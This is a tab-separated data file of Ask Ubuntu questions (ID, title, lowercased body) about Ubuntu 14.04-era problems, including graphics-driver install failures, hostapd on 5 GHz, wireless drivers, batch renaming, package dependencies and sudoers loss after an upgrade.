457690	14.04 installation problems	i run ubuntu at home - i 've installed it loads of times on lots of machines . in an effort to migrate away from xp ( and save him the expense of paying for a windows licence ) , i have persuaded my father-in-law to try ubuntu . his machine is quite old , so i was going to go for xubuntu . i 've downloaded the 64bit and 32bit versions of ubuntu , lubuntu and xubuntu . initially , i tried installing both the 32bit and 64bit versions of ubuntu and xubuntu however the installation process just does not complete properly . after getting past the purple ( or blue for xubuntu ) screen , eventually the screen ends up being replaced by wide black and white vertical scripts and multicoloured dots on a black background . nothing seems to progress with the installation . i tried going to one of the other ttys and i can see that some processes are running ( i ca n't remember whether the xserver was running or not ) . in any case i suspect it might be a graphics driver problem ( his card is an nvidia geforce 7650gs adapter ) and from googling around i can see that ubuntu have swapped over to the nouveau drivers . is this the general consensus ? if so , any idea how i can progress with the installation ? or should i abandon it and go for ( sharp intake or breath ) another distribution ? thanks update : if it is the graphics driver causing problems , is there any way of switching to a proprietary driver during the installation ?
457696	how to create excel xlsx files from a script ?	i 'm looking for packages available in ubuntu main/universe repositories ( 14.04 ) able to create excel 2007+ xlsx files from a script ( python3 or perl ) my requirements : 100 % compatible excel xlsx files . solid and comprehensive documentation and a wide variety of examples/tutorials stable api write text , numbers , formulas and hyperlinks multiple worksheets full formatting merged cells charts autofilters worksheet png/jpeg images cell comments group and outlines
457698	i have 13.10 32bit on a laptop and want to upgrade to 14.04 lts . no upgrades found on everything that i have tried . need help	tried a lot of things and don ; t know how much i have screwed everything up . new to linux but having a good time up until i could not upgrade to 14.04 lts . seems like 13.10 has me tied down and i ca n't get free'
457702	ubuntu 14.04 + hostapd + 802.11a + iwlwifi = no ap !	this is my first time here , so please be kind . ; ) i have the following problem : i want so setup a 5ghz wifi-ap because the 2.4ghz is too crowded . i 'm using ubuntu 14.04 with a `` intel corporation wireless 3160 ( rev 83 ) '' wifi chip . now some relevant information : # lspci 01:00.0 network controller : intel corporation wireless 3160 ( rev 83 ) the driver used : # dmesg | grep iwl [ 15.421854 ] iwlwifi 0000:01:00.0 : irq 78 for msi/msi-x [ 15.902471 ] iwlwifi 0000:01:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 15.939685 ] iwlwifi 0000:01:00.0 : detected intel ( r ) dual band wireless ac 3160 , rev=0x164 [ 15.939772 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 15.940031 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 16.043741 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' [ 16.572386 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 16.572645 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 23.782843 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 23.783099 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s # cfg80211 : calling crda to update world regulatory domain [ 16.108973 ] cfg80211 : world regulatory domain updated : [ 16.108984 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 16.108989 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.108993 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.108997 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.109000 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.109004 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.109029 ] cfg80211 : calling crda for country : de [ 16.114458 ] cfg80211 : regulatory domain changed to country : de [ 16.114465 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 16.114470 ] cfg80211 : ( 2400000 khz - 2483500 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 16.114473 ] cfg80211 : ( 5150000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 16.114477 ] cfg80211 : ( 5250000 khz - 5350000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 16.114480 ] cfg80211 : ( 5470000 khz - 5725000 khz @ 40000 khz ) , ( n/a , 2698 mbm ) [ 16.114483 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) the capabilities of the chip : ap mode is supported . # iw list wiphy phy0 band 1 : capabilities : 0x1062 ht20/ht40 static sm power save rx ht20 sgi rx ht40 sgi no rx stbc max amsdu length : 3839 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 4 usec ( 0x05 ) ht tx/rx mcs rate indexes supported : 0-7 , 32 frequencies : * 2412 mhz [ 1 ] ( 16.0 dbm ) * 2417 mhz [ 2 ] ( 16.0 dbm ) * 2422 mhz [ 3 ] ( 16.0 dbm ) * 2427 mhz [ 4 ] ( 16.0 dbm ) * 2432 mhz [ 5 ] ( 16.0 dbm ) * 2437 mhz [ 6 ] ( 16.0 dbm ) * 2442 mhz [ 7 ] ( 16.0 dbm ) * 2447 mhz [ 8 ] ( 16.0 dbm ) * 2452 mhz [ 9 ] ( 16.0 dbm ) * 2457 mhz [ 10 ] ( 16.0 dbm ) * 2462 mhz [ 11 ] ( 16.0 dbm ) * 2467 mhz [ 12 ] ( 16.0 dbm ) ( passive scanning , no ibss ) * 2472 mhz [ 13 ] ( 16.0 dbm ) ( passive scanning , no ibss ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps band 2 : capabilities : 0x1062 ht20/ht40 static sm power save rx ht20 sgi rx ht40 sgi no rx stbc max amsdu length : 3839 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 4 usec ( 0x05 ) ht tx/rx mcs rate indexes supported : 0-7 , 32 frequencies : * 5180 mhz [ 36 ] ( 16.0 dbm ) ( passive scanning , no ibss ) * 5200 mhz [ 40 ] ( 16.0 dbm ) ( passive scanning , no ibss ) * 5220 mhz [ 44 ] ( 16.0 dbm ) ( passive scanning , no ibss ) * 5240 mhz [ 48 ] ( 16.0 dbm ) ( passive scanning , no ibss ) * 5260 mhz [ 52 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5280 mhz [ 56 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5300 mhz [ 60 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5320 mhz [ 64 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5500 mhz [ 100 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5520 mhz [ 104 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5540 mhz [ 108 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5560 mhz [ 112 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5580 mhz [ 116 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5600 mhz [ 120 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5620 mhz [ 124 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5640 mhz [ 128 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5660 mhz [ 132 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5680 mhz [ 136 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5700 mhz [ 140 ] ( 16.0 dbm ) ( passive scanning , no ibss , radar detection ) * 5720 mhz [ 144 ] ( disabled ) * 5745 mhz [ 149 ] ( disabled ) * 5765 mhz [ 153 ] ( disabled ) * 5785 mhz [ 157 ] ( disabled ) * 5805 mhz [ 161 ] ( disabled ) * 5825 mhz [ 165 ] ( disabled ) bitrates ( non-ht ) : * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 20 max scan ies length : 393 bytes coverage class : 0 ( up to 0m ) supported ciphers : * wep40 ( 00-0f-ac:1 ) * wep104 ( 00-0f-ac:5 ) * tkip ( 00-0f-ac:2 ) * ccmp ( 00-0f-ac:4 ) * cmac ( 00-0f-ac:6 ) available antennas : tx 0 rx 0 supported interface modes : * ibss * managed * ap * ap/vlan * monitor * p2p-client * p2p-go * unknown mode ( 10 ) software interface modes ( can always be added ) : * ap/vlan * monitor valid interface combinations : * # { managed } < = 1 , # { ap , p2p-client , p2p-go } < = 1 , # { unknown mode ( 10 ) } < = 1 , total < = 3 , # channels < = 1 supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * remain_on_channel * set_tx_bitrate_mask * action * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * unknown command ( 84 ) * unknown command ( 87 ) * unknown command ( 85 ) * unknown command ( 89 ) * unknown command ( 92 ) * connect * disconnect supported tx frame types : * ibss : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * managed : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap/vlan : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * mesh point : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-client : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-go : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * unknown mode ( 10 ) : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 supported rx frame types : * ibss : 0x40 0xb0 0xc0 0xd0 * managed : 0x40 0xd0 * ap : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * ap/vlan : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * mesh point : 0xb0 0xc0 0xd0 * p2p-client : 0x40 0xd0 * p2p-go : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * unknown mode ( 10 ) : 0x40 0xd0 device supports rsn-ibss . wowlan support : * wake up on disconnect * wake up on magic packet * wake up on pattern match , up to 20 patterns of 16-128 bytes * can do gtk rekeying * wake up on gtk rekey failure * wake up on eap identity request * wake up on 4-way handshake * wake up on rfkill release ht capability overrides : * mcs : ff ff ff ff ff ff ff ff ff ff * maximum a-msdu length * supported channel width * short gi for 40 mhz * max a-mpdu length exponent * min mpdu start spacing device supports tx status socket option . device supports ht-ibss . the 2.4ghz part looks good , but the `` no ibss '' in `` band 2 '' seems strange . this is the configuration for hostapd : # cat /etc/hostapd/hostapd.conf interface=wlan0 driver=nl80211 ssid=xxx channel=48 ignore_broadcast_ssid=0 country_code=de ieee80211d=1 hw_mode=a ieee80211n=1 ht_capab= [ ht40- ] [ short-gi-40 ] [ dsss_cck-40 ] beacon_int=100 dtim_period=2 macaddr_acl=0 max_num_sta=10 rts_threshold=2347 fragm_threshold=2346 logger_syslog=-1 logger_syslog_level=2 logger_stdout=-1 logger_stdout_level=2 ctrl_interface=/var/run/hostapd ctrl_interface_group=0 auth_algs=3 wmm_enabled=1 wpa=2 rsn_preauth=1 rsn_preauth_interfaces=wlan0 wpa_key_mgmt=wpa-psk rsn_pairwise=ccmp wpa_group_rekey=600 wpa_ptk_rekey=600 wpa_gmk_rekey=86400 wpa_passphrase=xxx and this is the output of hostapd : # sudo hostapd /etc/hostapd/hostapd.conf -dd random : trying to read entropy from /dev/random configuration file : /etc/hostapd/hostapd.conf ctrl_interface_group=0 nl80211 : could not add multicast membership for vendor events : -2 ( no such file or directory ) rfkill : initial event : idx=0 type=2 op=0 soft=0 hard=0 rfkill : initial event : idx=1 type=1 op=0 soft=0 hard=0 nl80211 : supported cipher 00-0f-ac:1 nl80211 : supported cipher 00-0f-ac:5 nl80211 : supported cipher 00-0f-ac:2 nl80211 : supported cipher 00-0f-ac:4 nl80211 : supported cipher 00-0f-ac:6 nl80211 : using driver-based off-channel tx nl80211 : use separate p2p group interface ( driver advertised support ) nl80211 : interface wlan0 in phy phy0 nl80211 : set mode ifindex 3 iftype 3 ( ap ) nl80211 : failed to set interface 3 to mode 3 : -16 ( device or resource busy ) nl80211 : try mode change after setting interface down nl80211 : set mode ifindex 3 iftype 3 ( ap ) nl80211 : mode change succeeded while interface is down nl80211 : setup ap ( wlan0 ) - device_ap_sme=0 use_monitor=0 nl80211 : subscribe to mgmt frames with ap handle 0xb497b0 nl80211 : register frame type=0xb0 nl_handle=0xb497b0 match= nl80211 : register frame type=0x0 nl_handle=0xb497b0 match= nl80211 : register frame type=0x20 nl_handle=0xb497b0 match= nl80211 : register frame type=0xa0 nl_handle=0xb497b0 match= nl80211 : register frame type=0xc0 nl_handle=0xb497b0 match= nl80211 : register frame type=0xd0 nl_handle=0xb497b0 match= nl80211 : register frame type=0x40 nl_handle=0xb497b0 match= nl80211 : add own interface ifindex 3 nl80211 : do not indicate p2p_device support ( p2p_device=1 driver param not specified ) phy : phy0 bss count 1 , bssid mask 00:00:00:00:00:00 ( 0 bits ) wlan0 : interface state uninitialized- > country_update previous country code de , new country code de nl80211 : regulatory information - country=de nl80211 : 2400-2483 @ 40 mhz 20 mbm nl80211 : 5150-5250 @ 40 mhz 20 mbm nl80211 : 5250-5350 @ 40 mhz 20 mbm nl80211 : 5470-5725 @ 40 mhz 26 mbm nl80211 : 57240-65880 @ 2160 mhz 40 mbm nl80211 : added 802.11b mode based on 802.11g information allowed channel : mode=1 chan=1 freq=2412 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=2 freq=2417 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=3 freq=2422 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=4 freq=2427 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=5 freq=2432 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=6 freq=2437 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=7 freq=2442 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=8 freq=2447 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=9 freq=2452 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=10 freq=2457 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=11 freq=2462 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=1 freq=2412 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=2 freq=2417 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=3 freq=2422 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=4 freq=2427 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=5 freq=2432 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=6 freq=2437 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=7 freq=2442 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=8 freq=2447 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=9 freq=2452 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=10 freq=2457 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=11 freq=2462 mhz max_tx_power=20 dbm **channel [ 3 ] ( 48 ) is disabled for use in ap mode , flags : 0x77 no-ibss passive-scan** **wlan0 : ieee 802.11 configured channel ( 48 ) not found from the channel list of current mode ( 2 ) ieee 802.11a** **wlan0 : ieee 802.11 hardware does not support configured channel** **could not select hw_mode and channel . ( -3 ) ** **wlan0 : unable to setup interface . ** hostapd_interface_deinit_free ( 0xb48d90 ) hostapd_interface_deinit_free : num_bss=1 conf- > num_bss=1 hostapd_interface_deinit ( 0xb48d90 ) hostapd_bss_deinit : deinit bss wlan0 wlan0 : flushing old station entries nl80211 : flush - > del_station wlan0 ( all ) wlan0 : deauthenticate all stations nl80211 : send_mlme - noack=0 freq=0 no_cck=0 offchanok=0 wait_time=0 fc=0xc0 nlmode=3 nl80211 : send_mlme - > send_frame nl80211 : send_frame - use bss- > freq=0 nl80211 : send_frame - > send_frame_cmd nl80211 : cmd_frame freq=0 wait=0 no_cck=0 no_ack=0 offchanok=0 cmd_frame - hexdump ( len=26 ) : c0 00 00 00 ff ff ff ff ff ff a0 88 69 24 65 da a0 88 69 24 65 da 00 00 03 00 nl80211 : frame command failed : ret=-22 ( invalid argument ) ( freq=0 wait=0 ) wpa_driver_nl80211_set_key : ifindex=3 ( wlan0 ) alg=0 addr= ( nil ) key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 ( wlan0 ) alg=0 addr= ( nil ) key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 ( wlan0 ) alg=0 addr= ( nil ) key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 ( wlan0 ) alg=0 addr= ( nil ) key_idx=3 set_tx=0 seq_len=0 key_len=0 hostapd_cleanup ( hapd=0xb4c760 ( wlan0 ) ) hostapd_free_hapd_data : interface wlan0 was n't started hostapd_interface_deinit_free : driver=0x4bc6c0 drv_priv=0xb4d6a0 - > hapd_deinit nl80211 : remove monitor interface : refcount=0 nl80211 : remove beacon ( ifindex=3 ) netlink : operstate : ifindex=3 linkmode=0 ( kernel-control ) , operstate=6 ( if_oper_up ) nl80211 : set mode ifindex 3 iftype 2 ( station ) nl80211 : failed to set interface 3 to mode 2 : -16 ( device or resource busy ) nl80211 : try mode change after setting interface down nl80211 : set mode ifindex 3 iftype 2 ( station ) nl80211 : mode change succeeded while interface is down nl80211 : teardown ap ( wlan0 ) - device_ap_sme=0 use_monitor=0 nl80211 : unsubscribe mgmt frames handle 0x88888888883c1f39 ( ap teardown ) hostapd_interface_free ( 0xb48d90 ) hostapd_interface_free : free hapd 0xb4c760 hostapd_cleanup_iface ( 0xb48d90 ) hostapd_cleanup_iface_partial ( 0xb48d90 ) hostapd_cleanup_iface : free iface=0xb48d90 i googled already a lot , but did n't find something suitable . most of the time these were regdomain errors . i marked the interesting output of hostapd with ** if i configure hostapd for hw_mode=g and channel 1 f.ex . all works fine . i appreciate every help ! kind regards
457704	wireless issues with vaio flip 14a	edit : the output using lspci command mobtaker @ ebtkar : ~ $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.5 pci bridge : intel corporation lynx point-lp pci express root port 6 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 10 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5227 pci express card reader ( rev 01 ) installed ubuntu 14.04 to my new machine , but the wireless does not work . i tried few tricks like rfkill command but nothing worked : ( the machine does not have a wireless button . thanks in advqce for your help
457705	batch files renaming w/ filename 's shift	i have a ton of files named this way : [ name ] _ [ phonenumber ] _hh-mm-ss_dd-mm-yyyy.mp3 . how can i shift [ name ] and [ phonenumber ] to the end of file name , and put the date in the beginning in form of yyyy-mm-dd_hh-mm-ss so i get yyyy-mm-dd_hh-mm-ss_ [ name ] _ [ phonenumber ] ? here is an actual file name : [ unknown ] _ [ +74999519075 ] _18-01-36_17-01-2014.mp3 i 've tried rename , but due to lack of regexp knowledge i did n't come up with a working solution .
457708	headphones not working in ubuntu 14.04	my headphones were not working suddenly on ubuntu 14.04 so i decided to fix it following 3.step in this article : http : //www.unixmen.com/2012003-howto-resolve-nosound-problem-on-ubuntu/ now my headphones are still not working + everything from system settings somewhere disappeared ... luckly this missing system settings in ubuntu 14.04 after customization question did fix it and all my icons are back but still do n't know how to solve the sound from headphones . now i will be more careful ... do anyone know any trusted ways how to solve this ? it was working in past ...
457711	page borders gone in evince after 14.04 upgrade	after upgrading to ubuntu 14.04 , the thin black borders that appear around pages in evince have disappeared . now , when i 'm reading a pdf file in evince , the pages appear white against a background that 's very slightly pink , but without the page border you have to squint to see the boundary between the page and the background . the result when viewing documents in continuous mode is that there appear to be big chunks of needless white space in the middle of the document ( where in fact there is merely a page boundary ) , and it looks rather odd . i do n't want to turn off continuous mode , and apart from this i think evince is brilliant , so i 'd be very reluctant to change pdf viewer . is this change in appearance caused by the new default theme in 14.04 ( with its lack of borders ) ? what can i do to get back my bordered documents ?
457714	installing unbuntu on a fresh hard drive	newb alert here ! i am building a new computer and instead of buying windows 8 again ( they are n't letting me use my other copy to put on my new hard drive ) i wanted to know if i could install unbuntu on a new , internal hard drive ? i have read a few forums and it seems like it is , but i wanted to ask for myself before i went ahead and did something that could potentially be stupid . thanks for not being mean . : )
457716	xfce : quick launch panel does n't show up on hover	somehow `` quick launch '' bar at the botton of screen does n't pop up when i hover mouse over where it should be . if i select this panel in panel properties from upper bar , i can unset `` automatically show/hide the panel '' and it stays on screen . but how to make it appear when i mouse over the hidden panel ?
457717	how do i replace windows xp with lubuntu ?	i am rather a noob and have never installed anything before , but i would really like to completely replace my windows xp with lubuntu . i have saved all my photos and music already so that is sorted . the thing is i really do n't know step-by-step what to do next . i have blank cds and a usb all ready to go but what next ? please be gentle with me ! ( o : hey man thanks so much for the reply ! i think in a normal world it would work brilliantly but sadly my computer is not living in the normal world . i followed you advice to the letter but i think perhaps because my computer is stuck in the loop of 'windows genuine notifications ' it is blocking normal pathways . i do have genuine windows but it has apparently been a problem for a lot of people in the past and i tried for a few days last year to fix it with internet advice but it did n't take . anyhoo ... what has been happening is it all works until i get to where it is downloaded and i try to right click to copy or burn but it wants me to 'open with ' and when i try to open it with something i have a limited list of things like 'firefox/explorer/winrar.exe/windows media player etc ' if i try to 'open ' it with firefox i get a blank page and nothing happens , if i try to open it with winrar i get a red 'x ' sign , if i try to open it with anything windows based i get a 'windows genuine notifications ' request which is impenetrable as i have learned over the years ... could you perhaps recommend something for me to download that would be an appropriate channel through which i can 'open ' the downloaded file ? if i can get past that i 'm sure it would be smooth sailing . cheers !
457719	how to install kivy under ubuntu ?	can someone provide me with clear install instructions for kivy ? their install instruction is not very good . but i have tried , which i 've found here : sudo add-apt-repository ppa : kivy-team/kivy sudo apt-get update sudo apt-get install kivy put their example inside kivytest.py and get : traceback ( most recent call last ) : file `` kivytest.py '' , line 1 , in < module > from kivy.app import app importerror : no module named 'kivy'
457725	weird text boxes showing in gedit and bluefish editor , as well as firefox	i have ubuntu 14.04 installed on my computer , i use gedit and bluefish for html and css edits ( if theres any better ones out there let me know : ) ) and for some reason apostrophes and quotes sometimes show these weird text boxes , and i can do a find & replace to fix some of them , but most of them i miss when i 'm viewing a webpage . when the code is being rendered it shows a question mark .
457726	failure to install postgresql-plperl-8.4 on ubuntu 14.04	i have recently had a problem installing postgresql-plperl-8.4 on the new ubuntu 14.04 distribution . the reason why i am installing older version of plperl is that the server getting upgraded needs to run postgresql 8.4 due to compatibility issues with other servers running 8.4 . when i tried to install postgresql-plperl-8.4 ( package obtained from pkgs.org ) , i got this error : postgresql-plperl-8.4 depends on libperl5.10 ( > = 5.10.1 ) ; however : package libperl5.10 is not installed . fine , then i checked what version of libperl is installed on 14.04 using dpkg and got : libperl5.18 : /usr/share/doc/libperl5.18 libperl5.18 : /usr/share/lintian/overrides/libperl5.18 which suggests that i have libperl installed with a version that satisfies the need for postgresql-plperl-8.4 and yet it is giving me errors . can anyone help ?
457727	udp errors in ubuntu server	we are regularly getting udp errors in one of our dhcp server with a continues increase in pattern , see below the udp errors ( delay of 10 seconds ) 634822 packet receive errors 634893 packet receive errors 634959 packet receive errors 634961 packet receive errors 634976 packet receive errors 634989 packet receive errors see one example of netstat -su icmpmsg : intype0 : 3036 intype3 : 792918 intype8 : 28325 intype11 : 41 outtype0 : 28325 outtype3 : 19805 outtype8 : 77310 udp : 3145378 packets received 20480 packets to unknown port received . 636419 packet receive errors 2899799 packets sent rcvbuferrors : 173 udplite : ipext : inoctets : -1625660786 outoctets : 1622539094 background - ipam ( efficient ip ) web application is a front end of dhcp server os distribution - ubuntu 12.04.2 lts memory - 36g please guide us with the next step for resolution .
457729	ubuntu 14.04 wireless constantly disconnects	i installed ubuntu 14.04 and not my wifi occasionally disconnect and i have to turn it off then back on to get wifeless again centrino wireless-n 1030 this is what i am using
457731	best way to back up entire system to upgrade to larger msata ?	i am a total ubuntu noob . i have a mini server set up nicely on my intel nuc . all the settings are just right , with network mounts from my nas etc . however , i used a 30gb msata and am running out of room . i have bought a new 120gb msata which i want to upgrade to . obviously i ca n't copy the files directly . i know there are several backup options , but can someone suggest what the best way ( i.e . software ) of doing this would be ? presumably i will need to backup , partition and install a fresh system on the new msata , and then restore the backup ?
457733	is ubuntu running all users at the same time ?	every time when i have some memory intensive things running on one user and switch to another one , i can see that the memory usage continues . is the other user actually still running ? if so , is it possible to have ubuntu save the user workspace state to the harddrive and then kill everything running or something equal ?
457734	what is the best choice to replace rds server ... ltsp or xdmcp in 14.04	at work i need to replace remote desktop server with same ubuntu server that give me ability to attach hp thin clients with it so users can login to desktop and run application same as windows rd . for 3 days i searched and found this 2 services ltsp & xdmcp but ca n't identify which one is more suited .
457736	just installed ubuntu on my 13 '' late 2013 macbook pro retina and failed !	just installed ubuntu on my 13 '' late 2013 macbook pro retina . it boots through the boot up selection but stops at the black screen with the blinking > . any help ?
457743	ca n't connect to wifi	i downloaded ubuntu and now i ca n't connect to wifi and that is why do something . i have n't got any permanent connection through lan . my computer does n't see anything and i do n't know where to download drivers for wifi for ubuntu or what to do with system . model of my laptop is dell inspiron 1470 . version of ubuntu - 12.04 . pls , help me good people : )
457744	how to transfer money from my developer account ?	i have $ 22 in my developer account . i want to transfer this money to my paypal account . how can i do it ? is there any limit for the transfer or any time we should wait .
457746	limit user to directory only	i have a virtual host at apache . i want to give access to that folder via ssh / sftp only . however i need to limit that user to not execute anything or browse other directories.only /var/www/userdomain/ how can i achieve that ? i dont want to use plain ftp or an ftp server .
457751	upgraded server from 12.04 lts to 14.04 lts - lost sudoers	i am no longer able to control my server from the one user i have access to . when performing sudo commands , i am presented with the following error : usernamehere is not in the sudoers file . this incident will be reported . presumably this can not be fixed without access to the root username ? i can restore from a vm image to prior to the upgrade , but if i were to perform the upgrade again , what should i do differently to avoid this ? i did n't see any mention of the sudoers file being overwritten in the process .
457754	is there any free chemistry software available for ubuntu that 's capable of creating svg files with acs settings ?	i 'd like to know if any of you 's know a chemistry software that 's capable of using acs settings . i have tried , marvinsketch ( loading acs style ) and it failed as it failed to adequately render the chemical symbols ( i.e . their letter abbreviations ) . any ideas ?
457755	ubuntu reinstall	i recently really messed up on ubuntu along with i 've had problems with upgrading to 14.04 and i want to get rid of my windows side , i 'm using dual boot . i want to pretty much just get rid of the windows partition and get rid of ubuntu 14.04 and revert back to 13.10 . hour would you go about doing that ? i understand how to if no ubuntu is on the computer , but what about my situation ?
457761	how can i switch to a keyboard layout ?	i just upgraded to ubuntu 14.04 and i ca n't use my old keyboard layout configuration . i used the caps lock key to change the layout to hungarian . and i used the shift - caps lock key to change the layout to english . how can i set this keyboard shortcut in ubuntu 14.04 ? all i can do is a previous source and next source option in all settings - > keyboard - > shortcuts - > typing . but i do n't know which was selected in most case , so i prefer start hit caps-lock before writing hungarian , and shift-capslock when i start programming . but now i can just rotate this sources ( layouts ) which is non-sense to me . i am not a finite state machine to remember my keyboard layout state .
457766	disable access to system configuration	i 'm looking for a way to disable access to system configuration for users in ubuntu 12.04 , specifically i 'm trying to disable the access to sound configuration . is there any way to do that ? i 've tried it with ubuntu tweak , gcompiz and something else , but i do n't have more ideas . could you help me please ? thanks !
